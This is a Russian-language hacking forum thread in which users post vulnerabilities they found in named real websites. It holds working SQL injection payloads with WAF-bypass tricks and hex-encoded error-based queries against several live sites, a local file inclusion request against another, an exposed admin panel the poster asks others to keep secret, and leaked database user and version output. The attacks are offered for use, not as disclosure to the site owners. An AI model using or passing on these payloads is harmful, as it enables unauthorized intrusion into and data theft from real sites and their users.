![]() |
Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.
Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так: Google: Код:
Code:Цитата:
|
Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд . |
Три lfi
http://greyslon.ru/index.php post action=register &ajax=true &data=login%3De%26email%3De%26pass%3De%26repass%3D e%26payeer%3De%26captcha%3De &page=../info Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла |
bidderland.co.in/siteadmin
Эта уязвимость эксплуатируется за 5 секунд. нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете. |
Цитата:
Код:
Code:User: c2deuts_ice@localhost ----------------------------- Цитата:
|
Цитата:
|
Код HTML:
HTML:Код HTML:
HTML:Код HTML:
HTML: |
Код HTML:
HTML:idserver_damicodb 5.5.42-cll |
http://goo.gl/imjzsb
http://goo.gl/8IKVeV http://goo.gl/wYRBLz http://emofans.ru/gallery/emowallp/ POST_DATA: foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0 x7e7e496e6a6563746564204279204d69737465725f4265727 4306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version() )e)f)x)) -- - https://www.choosewellness.com.ph/ca...entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e20 7374796c653d22666f6e742d66616d696c793a4963656c616e 643b636f6c6f723a7265643b73697a653a353b746578742d73 6861646f773a23303030203070782030707820337078223e4d 69737465725f42657274306e693c62723e,0x4461746162617 365203a3a202020,DATABASE(),0x3c62723e506f727420203 a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3 a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSIO N_COMPILE_MACHINE,0x3c62723e56657273696f6e206f6620 4461746162617365203a3a2020,version(),0xa3c62723e48 6f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e ))x)x) |
Демонстрация SQLi от меня
|
| Время: 03:32 |